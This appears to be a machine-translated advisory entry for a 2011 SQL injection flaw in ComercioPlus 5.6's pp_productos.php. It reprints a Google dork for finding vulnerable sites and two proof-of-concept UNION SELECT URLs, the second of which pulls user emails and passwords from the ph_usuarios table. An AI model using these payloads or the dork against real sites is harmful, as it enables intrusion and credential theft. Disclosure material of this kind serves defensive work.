ComercioPlus 5.6 SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

2011-01-29T00:00:00
ID MYHACK58:62201128964
Type myhack58
Reporter 佚名
Modified 2011-01-29T00:00:00

Description

|

ComercioPlus is a use PHP to write to the virtual store system, ComercioPlus 5. 6 edition of the pp_productos. php file exists SQL injectionvulnerability, may lead to sensitive information disclosure.

[+]info: ~~~~~~~~~

Exploit Title: Comerciosonline CMS SQLi

Google Dork: allintext: "Servicio ofrecido por ComerciosOnLine"

Date: 27/01/2011

Author: Daniel Godoy

Author Mail: DanielGodoy[at]GobiernoFederal[dot]com

Author Web: www.delincuentedigital.com.ar

Software Link: <http://www.comerciosonline.com/index.php?p=8>

Version: All

Tested on: Linux, Windows

[+]poc: ~~~~~~~~~ http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5-- http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--

[+]Reference: ~~~~~~~~~ <http://www.exploit-db.com/exploits/16060>

Fix: pp_productos. php filter